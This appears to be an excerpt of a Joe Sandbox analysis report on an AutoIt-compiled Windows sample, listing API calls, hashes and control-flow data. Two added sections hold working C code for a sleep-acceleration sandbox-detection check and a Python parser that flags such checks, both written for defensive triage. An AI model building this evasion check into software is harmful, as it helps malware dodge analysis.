• Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
• Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
APIs
  • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
• Sleep.KERNEL32(0000000A), ref: 00409870
• timeGetTime.WINMM ref: 00409880
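The Sleep(0xA) immediately followed by timeGetTime in the function above is the sleep-then-read-clock pattern that sandbox heuristics flag as a sleep-reduction check: code requests a short wait and then compares the clock before and after to see whether the wait really happened. The block below is an added example written for this report, not code recovered from the sample and not Joe Sandbox code; it models the check so an analyst can confirm whether an analysis environment honours sleeps. It assumes a POSIX system and substitutes nanosleep()/clock_gettime(CLOCK_MONOTONIC) for the Windows Sleep()/timeGetTime() pair so it builds outside Windows; the patched_sleep helper is a hypothetical stand-in for a sandbox hook that makes Sleep return without waiting.

```c
/* Added example: sleep-then-read-clock check, not code from the analysed
 * sample. POSIX nanosleep/clock_gettime stand in for Sleep/timeGetTime
 * (assumption so the example runs on Linux/BSD). */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* Signature of a "sleep for N milliseconds" routine, like Sleep(ms). */
typedef void (*sleep_fn)(uint32_t ms);

/* Monotonic clock in nanoseconds; plays the role of timeGetTime(). */
static uint64_t now_ns(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}

/* Real sleeper: blocks for at least `ms` milliseconds, resuming after EINTR. */
static void real_sleep(uint32_t ms) {
    struct timespec req = { (time_t)(ms / 1000), (long)(ms % 1000) * 1000000L };
    while (nanosleep(&req, &req) != 0) { /* interrupted: finish the remainder */ }
}

/* Hypothetical sandbox hook: returns at once, as a "fast-forwarded" Sleep would. */
static void patched_sleep(uint32_t ms) { (void)ms; }

/* Milliseconds that actually elapsed around a call to `sleeper(ms)`. */
uint64_t measured_sleep_ms(sleep_fn sleeper, uint32_t ms) {
    uint64_t before = now_ns();
    sleeper(ms);
    uint64_t after = now_ns();
    return (after - before) / 1000000ull;
}

/* 1 if the clock advanced by at least the requested `ms` (sleep honoured),
 * 0 if it advanced less (sleep skipped or shortened, as a patched sandbox does). */
int sleep_was_honoured(sleep_fn sleeper, uint32_t ms) {
    uint64_t before = now_ns();
    sleeper(ms);
    uint64_t after = now_ns();
    return (after - before) >= (uint64_t)ms * 1000000ull;
}

int main(void) {
    /* Same 10 ms the sample passes to Sleep (0x0000000A). */
    printf("real sleep honoured:    %d (%llu ms elapsed)\n",
           sleep_was_honoured(real_sleep, 10),
           (unsigned long long)measured_sleep_ms(real_sleep, 10));
    printf("patched sleep honoured: %d (%llu ms elapsed)\n",
           sleep_was_honoured(patched_sleep, 10),
           (unsigned long long)measured_sleep_ms(patched_sleep, 10));
    return 0;
}
```

When triaging a report like this one, the practical use is the reverse of the malware's: run the check inside the sandbox profile you intend to use and confirm it returns 1 for the real sleeper, otherwise samples that gate on elapsed time will take a different path than they would on a victim machine. Note that a short Sleep followed by a clock read also occurs in ordinary runtime code (timed loops, polling), so this pattern alone is an indicator, not proof of evasion.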
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3219444185-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A
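The Sleep.KERNEL32(0000000A) call immediately followed by timeGetTime.WINMM in this function body is the shape of a sleep-acceleration check: request a short sleep (0xA = 10 ms) and read a timer to see whether wall-clock time actually passed, which is what the "Contains functionality to detect sleep reduction / modifications" signature in the overview is looking for. The following is an added triage helper, not part of the Joe Sandbox report or its IDA plugin output: it parses API bullets of the form shown above (API name, module, arguments, reference address, optional "Part of subcall function" prefix) and flags a function body that contains both a Sleep and a timer read. The two sample records are copied from this page; the TIMERS set and the pairing heuristic are the example's own assumptions.

```python
"""Parse Joe Sandbox function-record API bullets and flag Sleep + timer-read pairs.

Added example for triaging report text offline; not Joe Sandbox code.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One API bullet, after the leading "•" is stripped, looks like one of:
#   Sleep.KERNEL32(0000000A), ref: 00409870
#   timeGetTime.WINMM ref: 00409880
#   Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Timer-reading APIs commonly paired with Sleep in accelerated-sleep checks
# (assumed list for this example, not taken from the report).
TIMERS = {"timeGetTime", "GetTickCount", "GetTickCount64",
          "QueryPerformanceCounter", "GetSystemTimeAsFileTime"}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: int                 # address of the call site, from "ref:"
    subcall: Optional[int]   # callee address when the API lives in a subcall


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract every API bullet from a record; headers and hash lines are ignored."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def requested_sleep_ms(call: ApiCall) -> Optional[int]:
    """Decode the first Sleep argument (hex in the report); None if symbolic ('?')."""
    if not call.args or not re.fullmatch(r"[0-9A-Fa-f]+", call.args[0]):
        return None
    return int(call.args[0], 16)


def sleep_timing_check(calls: List[ApiCall]) -> Optional[Tuple[ApiCall, ApiCall]]:
    """Heuristic: a function body (subcalls excluded) that both sleeps and reads a
    timer is a candidate sleep-acceleration check. Returns (sleep, timer) or None."""
    direct = sorted((c for c in calls if c.subcall is None), key=lambda c: c.ref)
    sleeps = [c for c in direct if c.name in ("Sleep", "SleepEx")
              and c.module.upper().startswith("KERNEL32")]
    timers = [c for c in direct if c.name in TIMERS]
    if sleeps and timers:
        return sleeps[0], timers[0]
    return None


# Sample input copied from the record above (the function at 00409870 region).
SAMPLE_TIMING_RECORD = """APIs
  • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
• Sleep.KERNEL32(0000000A), ref: 00409870
• timeGetTime.WINMM ref: 00409880
"""

# Sample input copied from the GUI-initialisation record on this page (negative case).
SAMPLE_GUI_RECORD = """APIs
• GetSysColorBrush.USER32 ref: 00410326
• RegisterClassExW.USER32 ref: 00410359
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
• InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
• LoadIconW.USER32(00400000,000000A9), ref: 004103B1
"""

if __name__ == "__main__":
    hit = sleep_timing_check(parse_api_lines(SAMPLE_TIMING_RECORD))
    if hit:
        sleep, timer = hit
        print(f"candidate sleep check: Sleep({requested_sleep_ms(sleep)} ms) at "
              f"{sleep.ref:08X}, {timer.name} at {timer.ref:08X}")
    print("GUI record flagged:", sleep_timing_check(parse_api_lines(SAMPLE_GUI_RECORD)) is not None)
```

Subcall entries are parsed but excluded from the pairing so that a timer read deep inside a helper does not produce a false hit; widen `TIMERS` or include subcalls if the sample under review spreads the check across functions.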

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __fread_nolock$_fseek_wcscpy
• String ID: FILE
• API String ID: 3888824918-3121273764
• Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
• Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
• Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
• Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

Control-flow Graph

APIs
• GetSysColorBrush.USER32 ref: 00410326
• RegisterClassExW.USER32 ref: 00410359
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
• InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
• LoadIconW.USER32(00400000,000000A9), ref: 004103B1
• ImageList_ReplaceIcon.COMCTL32(00A7F4B8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
• Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
• Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
• Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 004101F9
• LoadCursorW.USER32(00000000,00007F00), ref: 00410209
• LoadIconW.USER32(?,00000063), ref: 0041021F
• LoadIconW.USER32(?,000000A4), ref: 00410232
• LoadIconW.USER32(?,000000A2), ref: 00410245
• LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
• RegisterClassExW.USER32 ref: 004102C6
  • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00A7F4B8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #$0$PGH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 423443420-3673556320
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 004525DA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 0045267D
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00452689
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00452696
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1911931848-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1344 40f450-40f45c call 425210 1347 40f460-40f478 1344->1347 1347->1347 1348 40f47a-40f4a8 call 413990 call 410f70 1347->1348 1353 40f4b0-40f4d1 call 4151b0 1348->1353 1356 40f531 1353->1356 1357 40f4d3-40f4da 1353->1357 1360 40f536-40f540 1356->1360 1358 40f4dc-40f4de 1357->1358 1359 40f4fd-40f517 call 41557c 1357->1359 1361 40f4e0-40f4e2 1358->1361 1364 40f51c-40f51f 1359->1364 1363 40f4e6-40f4ed 1361->1363 1365 40f521-40f52c 1363->1365 1366 40f4ef-40f4f2 1363->1366 1364->1353 1369 40f543-40f54e 1365->1369 1370 40f52e-40f52f 1365->1370 1367 42937a-4293a0 call 41557c call 4151b0 1366->1367 1368 40f4f8-40f4fb 1366->1368 1381 4293a5-4293c3 call 4151d0 1367->1381 1368->1359 1368->1361 1372 40f550-40f553 1369->1372 1373 40f555-40f560 1369->1373 1370->1366 1372->1366 1374 429372 1373->1374 1375 40f566-40f571 1373->1375 1374->1367 1377 429361-429367 1375->1377 1378 40f577-40f57a 1375->1378 1377->1363 1380 42936d 1377->1380 1378->1366 1380->1374 1381->1360
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __fread_nolock_fseek_strcat
• String ID: AU3!$EA06
• API String ID: 3818483258-2658333250
• Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
• Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

Control-flow Graph

[Control-flow graph image for the function at 410130: basic blocks in 410130-4101ee and 42944f-429459, calling SHGetMalloc, SHGetDesktopFolder, SHGetPathFromIDListW and 411691; node/edge list omitted]
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _wcscpy$DesktopFolderFromListMallocPath
• String ID: C:\Users\user\Desktop\AENiBH7X1q.exe
• API String ID: 192938534-2362206303
• Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
• Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

Control-flow Graph

[Control-flow graph image for the function at 401230: basic blocks in 401230-4012cd and 42aa61-42ab15, calling 4131f0, 401be0, KillTimer, SetTimer and Shell_NotifyIconW; node/edge list omitted]
APIs
• _memset.LIBCMT ref: 00401257
  • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
  • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
  • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
  • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
• KillTimer.USER32(?,?), ref: 004012B0
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
• String ID:
• API String ID: 1792922140-0
• Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
• Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
• Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

Control-flow Graph
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0538E6E1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0538E907
Memory Dump Source
• Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
• Instruction ID: 1e83fcdd420b4eafba2d626591fa1a0e1cd0f0cf45180d71e83ff4932ccbf2f0
• Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
• Instruction Fuzzy Hash: 59A10874E00209EBDB18DFA4C894BBEB7BABF48704F208159E515BB280D7759A41DF54

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
• Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

Control-flow Graph
APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _memset.LIBCMT ref: 00401C62
• _wcsncpy.LIBCMT ref: 00401CA1
• _wcscpy.LIBCMT ref: 00401CBD
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
Strings
